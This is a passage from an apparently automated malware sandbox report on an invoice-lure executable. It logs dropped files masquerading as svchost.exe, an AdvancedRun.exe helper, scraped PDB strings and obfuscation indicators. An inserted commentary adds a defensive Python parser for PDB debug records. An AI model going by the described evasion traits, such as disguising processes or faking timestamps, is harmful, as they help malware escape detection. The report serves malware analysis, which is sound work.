        Source: C:\Windows\explorer.exe | Process created: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
        Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5604 -ip 5604
        Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 2060
        Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
        Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
        Source: C:\Windows\SysWOW64\WerFault.exe | Process created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | Process created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | Process created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | Process created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | Process created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | Process created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | Process created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | Process created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe | Process created: unknown unknown
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: CN-Invoice-XXXXX9808-19011143287990.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: CN-Invoice-XXXXX9808-19011143287990.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbo source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: crypt32.pdbb440 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: mscorlib.pdb>)^ source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: ml.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: .ni.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: clr.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: ility.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: fwpuclnt.pdb\4B0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: dhcpcsvc.pdbZ4\0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdb+_ source: WerFault.exe, 0000001E.00000003.353042308.00000000057F5000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdbT3Zl source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: winnsi.pdb03 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: fltLib.pdbJ source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: cryptbase.pdb= source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb@! source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: dwmapi.pdbF source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: i.pdb source: WerFault.exe, 0000001E.00000003.353586234.0000000005698000.00000004.00000001.sdmp
        Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: indows.Forms.pdb&& source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: mscoree.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb@4V0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: ility.pdbn source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdbR source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: nsi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdbX source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdbRSDS source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: ole32.pdbT source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: ole32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: WWCN-Invoice-XXXXX9808-19011143287990.PDB[[ source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: combase.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: iVisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: Accessibility.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.ni.pdbRSDS source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: System.Configuration.pdb`Q) source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb` source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdbRSDSD source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: Accessibility.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: shell32.pdb, source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: rawing.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: rasman.pdbN4P0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: version.pdbz source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: Accessibility.pdb>)^ source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: shcore.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: Accessibility.pdbT source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000001E.00000003.353586234.0000000005698000.00000004.00000001.sdmp
        Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: shell32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb* source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: winhttp.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc6.pdb>3 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbgl source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534358038.0000000007F80000.00000004.00000001.sdmp
        Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: HcC:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.PDB4 source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: profapi.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe, 00000008.00000000.260198849.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000027.00000000.419368466.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.22.dr
        Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: WLDP.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: sechost.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.ni.pdbRSDS source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: clrjit.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb?9W source: WerFault.exe, 0000001E.00000003.354208449.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdbL source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: rasman.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: propsys.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbows source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534442041.0000000007F9F000.00000004.00000001.sdmp
        Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: version.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: onfiguration.pdb source: WerFault.exe, 0000001E.00000003.353674656.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: O.pdb? source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: wintrust.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: powrprof.pdb| source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: oleaut32.pdbn source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: iertutil.pdbV4H0 source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001E.00000003.354144153.00000000057E0000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: bcrypt.pdbv source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001E.00000003.353447648.0000000005681000.00000004.00000001.sdmp
        Source: Binary string: System.Drawing.pdb| source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.PDB source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.460006260.00000000004F8000.00000004.00000010.sdmp
        Source: Binary string: cldapi.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001E.00000003.353586234.0000000005698000.00000004.00000001.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: combase.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001E.00000002.453753252.00000000059A0000.00000004.00000001.sdmp
        Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000001E.00000003.352878832.00000000057E2000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001E.00000003.352965020.00000000057EA000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbgl0.Y source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534358038.0000000007F80000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbqR source: CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.534358038.0000000007F80000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.pdb@ source: WERCCD7.tmp.dmp.30.dr
        Source: Binary string: System.ni.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp, WERCCD7.tmp.dmp.30.dr
        Source: Binary string: edputil.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001E.00000003.352772187.00000000057EE000.00000004.00000040.sdmp
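        The PDB strings above are scraped from process memory and from the WerFault dump, which is why most of them are truncated or carry trailing garbage. The ones worth acting on are the non-Microsoft paths: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb ties the dropped AdvancedRun.exe to a build of that tool, while the \??\C:\Windows\symbols\dll\... forms look like symbol-search probes rather than link-time paths. A string match alone is weak evidence; the CodeView RSDS record behind it also carries the PDB GUID and age, which is what a symbol store keys on. The following Python is an added example, not part of the Joe Sandbox report: it scans raw bytes (a file, a section, or a memory dump) for RSDS records, decodes GUID and age, and builds the symbol-store lookup path. The GUIDs and the sample blob are constructed for the example.

```python
import ntpath
import re
import struct
import uuid

# CodeView "RSDS" record as the linker writes it and IMAGE_DEBUG_DIRECTORY (type CODEVIEW) points to:
#   'RSDS' | GUID (16 bytes, mixed-endian Windows layout) | Age (u32 LE) | NUL-terminated PDB path
RSDS = re.compile(rb"RSDS(.{16})(.{4})([^\x00]{1,260})\x00", re.S)


def parse_rsds(blob: bytes) -> list:
    """Return one dict per plausible RSDS record found in blob (offset, path, guid, age, symbol-store key)."""
    records = []
    for m in RSDS.finditer(blob):
        raw_guid, raw_age, raw_path = m.groups()
        try:
            path = raw_path.decode("utf-8")
        except UnicodeDecodeError:
            continue                      # 'RSDS' can occur by chance; a non-text "path" means a false hit
        if not path.lower().endswith(".pdb"):
            continue
        guid = uuid.UUID(bytes_le=raw_guid)          # bytes_le undoes the little-endian Data1/2/3 layout
        age = struct.unpack("<I", raw_age)[0]
        name = ntpath.basename(path)
        key = "%s%X" % (guid.hex.upper(), age)       # symbol-store key: 32 hex digits of GUID + age in hex
        records.append({
            "offset": m.start(),
            "path": path,
            "guid": str(guid),
            "age": age,
            "symstore_key": key,
            "symstore_path": "%s/%s/%s" % (name, key, name),
        })
    return records


def make_rsds(guid: uuid.UUID, age: int, path: str) -> bytes:
    """Build an RSDS record; used only to construct the offline sample below."""
    return b"RSDS" + guid.bytes_le + struct.pack("<I", age) + path.encode("utf-8") + b"\x00"


# Constructed sample: two records with made-up GUIDs, separated by filler and one decoy 'RSDS' hit.
SAMPLE_GUID = uuid.UUID("12345678-9abc-def0-1122-334455667788")
SAMPLE_BLOB = (
    b"\x90" * 32
    + make_rsds(SAMPLE_GUID, 1, r"c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb")
    + b"\x00" * 16
    + b"RSDS" + b"\xff" * 20 + b"\x80\x81\x82\x00"       # decoy: signature present, "path" is not text
    + make_rsds(uuid.UUID(int=0), 3, r"C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.PDB")
)


if __name__ == "__main__":
    for rec in parse_rsds(SAMPLE_BLOB):
        print("%08x  age=%d  %s  %s" % (rec["offset"], rec["age"], rec["guid"], rec["path"]))
        print("          symstore: %s" % rec["symstore_path"])
```

Run it over a dropped file rather than the whole process dump when possible: the GUID and age from the RSDS record are what let you confirm against a vendor's symbol server that a file really is the build its PDB path claims, instead of trusting a path string an attacker can edit.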

        Data Obfuscation:

        Binary contains a suspicious time stamp
        Source: initial sample - Static PE information: 0x8AB4D40F [Tue Sep 29 02:29:35 2043 UTC]
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe - Code function: 8_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: CN-Invoice-XXXXX9808-19011143287990.exe - Static PE information: real checksum: 0x9f34 should be: 0x37eb0
        Source: svchost.exe.0.dr - Static PE information: real checksum: 0x9f34 should be: 0x37eb0
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe - Code function: 0_2_00086302 pushfd ; retf
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe - Code function: 0_2_00A62684 push 8400A3C3h; ret
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe - Code function: 0_2_0839CAB1 push cs; ret
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe - Code function: 0_2_0839CA83 push cs; ret
